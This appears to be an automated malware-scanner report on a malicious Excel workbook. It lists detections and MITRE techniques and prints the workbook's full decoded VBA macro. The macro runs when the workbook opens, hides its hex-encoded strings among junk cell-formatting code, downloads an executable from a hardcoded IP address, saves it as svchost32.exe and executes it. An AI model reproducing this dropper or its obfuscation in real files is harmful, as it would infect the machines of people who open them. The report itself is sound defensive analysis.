MALICIOUS
248
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
The Workbook_Open macro is triggered upon opening the Excel file. It contains obfuscated VBA code that utilizes CreateObject to instantiate 'Microsoft.XMLHTTP' and 'WScript.Shell'. The script then proceeds to download an executable file from the hardcoded URL 'http://13.234.238.111/gh/7110328.exe' and executes it, indicating a downloader or droppper functionality.
Heuristics 6
-
ClamAV: Xls.Malware.Sagent-10035294-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Sagent-10035294-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
strmweajsdjkvm_babu.write hthsduerkbxvbhagasdjl_babu.responseBody -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set hthsduerkbxvbhagasdjl_babu = CreateObject(PXcZFADsUy76FSRdPLVABY7609GffsdAxzsaMOPLQAW("4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50")) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set hthsduerkbxvbhagasdjl_babu = CreateObject(PXcZFADsUy76FSRdPLVABY7609GffsdAxzsaMOPLQAW("4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50")) -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6548 bytes |
SHA-256: 353af090280e87f9e670bc7fa5eaf56e78103d3ad26000aa803ca5fa80f1faee |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
COmm0NAzs893TraCXVaPlCXFQAEWRGFYTDZCXFA"68 74 74 70 3A 2F 2F 31 33 2E 32 33 34 2E 32 33 38 2E 31 31 31 2F 67 68 2F 37 31 31 30 33 32 38 2E 65 78 65"
End Sub
Public Sub COmm0NAzs893TraCXVaPlCXFQAEWRGFYTDZCXFA(Link As String)
Range("A1:J22").Select
Selection.Borders(xlDiagonalDown).LineStyle = xlNone
Selection.Borders(xlDiagonalUp).LineStyle = xlNone
With Selection.Borders(xlEdgeLeft)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
Dim hthsduerkbxvbhagasdjl_babu
With Selection.Borders(xlEdgeTop)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
Dim strmweajsdjkvm_babu
With Selection.Borders(xlEdgeBottom)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
Dim shelaorl_babu
With Selection.Borders(xlEdgeRight)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
Set hthsduerkbxvbhagasdjl_babu = CreateObject(PXcZFADsUy76FSRdPLVABY7609GffsdAxzsaMOPLQAW("4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50"))
With Selection.Borders(xlInsideVertical)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
Set strmweajsdjkvm_babu = CreateObject(PXcZFADsUy76FSRdPLVABY7609GffsdAxzsaMOPLQAW("41 44 4f 44 42 2e 53 74 72 65 61 6d"))
With Selection.Borders(xlInsideHorizontal)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
Set shelaorl_babu = CreateObject(PXcZFADsUy76FSRdPLVABY7609GffsdAxzsaMOPLQAW("57 53 63 72 69 70 74 2e 53 68 65 6c 6c "))
ActiveWindow.SmallScroll Down:=-12
Range("A1").Select
ActiveCell.FormulaR1C1 = "S.No"
Range("B1").Select
ActiveCell.FormulaR1C1 = "Name"
Range("C1").Select
ActiveCell.FormulaR1C1 = "Unit"
Range("D1").Select
ActiveCell.FormulaR1C1 = "Price"
Range("E1").Select
ActiveCell.FormulaR1C1 = "Qty"
Range("F1:J22").Select
Url = PXcZFADsUy76FSRdPLVABY7609GffsdAxzsaMOPLQAW(Link)
With Selection
.HorizontalAlignment = xlCenter
.VerticalAlignment = xlBottom
.WrapText = False
.Orientation = 0
.AddIndent = False
.IndentLevel = 0
.ShrinkToFit = False
.ReadingOrder = xlContext
.MergeCells = False
End With
Selection.Merge
urloasjdklweqad_babu = PXcZFADsUy76FSRdPLVABY7609GffsdAxzsaMOPLQAW("43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 73 76 63 68 6f 73 74 33 32 2e 65 78 65")
With Selection
.HorizontalAlignment = xlCenter
.VerticalAlignment = xlBottom
.WrapText = False
.Orientation = xlVertical
.AddIndent = False
.IndentLevel = 0
.ShrinkToFit = False
.ReadingOrder = xlContext
.MergeCells = True
End With
RUNCMD = PXcZFADsUy76FSRdPLVABY7609GffsdAxzsaMOPLQAW("43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 73 76 63 68 6f 73 74 33 32 2e 65 78 65")
Range("F1:J22").Select
ActiveCell.FormulaR1C1 = "S"
Range("F1:J22").Select
ActiveCell.FormulaR1C1 = "S" & Chr(10) & "u" & Chr(10) & "m" & Chr(10) & "r" & Chr(10) & "r" & Chr(10) & "y"
Range("F1:J22").Select
hthsduerkbxvbhagasdjl_babu.Open "G" + "E" + "T", Url, False
With Selection
.HorizontalAlignment = xlCenter
.VerticalAlignment = xlBottom
.Orientation = 0
.AddIndent = False
.IndentLevel = 0
.ShrinkToFit = False
.ReadingOrder = xlContext
.MergeCells = True
End With
hthsduerkbxvbhagasdjl_babu.send
Range("F1:J22").Select
With Selection
.HorizontalAlignment = xlCenter
.VerticalAlignment = xlCenter
.Orientation = 0
.AddIndent = False
.IndentLevel = 0
.ShrinkToFit = False
.ReadingOrder = xlContext
.MergeCells = True
End With
strmweajsdjkvm_babu.Type = 1
With Selection.Font
.Name = "Calibri"
.Size = 14
.Strikethrough = False
.Superscript = False
.Subscript = False
.OutlineFont = False
.Shadow = False
.Underline = xlUnderlineStyleNone
.ThemeColor = xlThemeColorLight1
.TintAndShade = 0
.ThemeFont = xlThemeFontMinor
End With
strmweajsdjkvm_babu.Open
Selection.Font.Bold = True
strmweajsdjkvm_babu.write hthsduerkbxvbhagasdjl_babu.responseBody
Selection.Font.Italic = True
strmweajsdjkvm_babu.savetofile urloasjdklweqad_babu, 2
Range("L4").Select
shelaorl_babu.Run RUNCMD
End Sub
Public Function PXcZFADsUy76FSRdPLVABY7609GffsdAxzsaMOPLQAW(ByVal AZplOKICbdgCBDgTrADSfPlo9823FCSdNmmBCGFTADSCXV As String) As String
Dim wSyzXMLHWUSHvLYkKMMXYQvilaCUFhOtEcxHOMzjKQAtRrAJPgqiIRa As String
Dim BskNReMCJaZCoNQWxhdNHPWROasZurAFICRkzTCZSOMTNogwUKNAfZT As String
Dim mVTzrmmdSuUPlQfWzeYutCDYutRakyzZEDePAULnBGOttZQAoINrcev As Long
For mVTzrmmdSuUPlQfWzeYutCDYutRakyzZEDePAULnBGOttZQAoINrcev = 1 To Len(AZplOKICbdgCBDgTrADSfPlo9823FCSdNmmBCGFTADSCXV) Step 3
wSyzXMLHWUSHvLYkKMMXYQvilaCUFhOtEcxHOMzjKQAtRrAJPgqiIRa = Chr$(Val("&H" & Mid$(AZplOKICbdgCBDgTrADSfPlo9823FCSdNmmBCGFTADSCXV, mVTzrmmdSuUPlQfWzeYutCDYutRakyzZEDePAULnBGOttZQAoINrcev, 2)))
BskNReMCJaZCoNQWxhdNHPWROasZurAFICRkzTCZSOMTNogwUKNAfZT = BskNReMCJaZCoNQWxhdNHPWROasZurAFICRkzTCZSOMTNogwUKNAfZT & wSyzXMLHWUSHvLYkKMMXYQvilaCUFhOtEcxHOMzjKQAtRrAJPgqiIRa
Next mVTzrmmdSuUPlQfWzeYutCDYutRakyzZEDePAULnBGOttZQAoINrcev
PXcZFADsUy76FSRdPLVABY7609GffsdAxzsaMOPLQAW = BskNReMCJaZCoNQWxhdNHPWROasZurAFICRkzTCZSOMTNogwUKNAfZT
End Function
Attribute VB_Name = "Sheet 1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.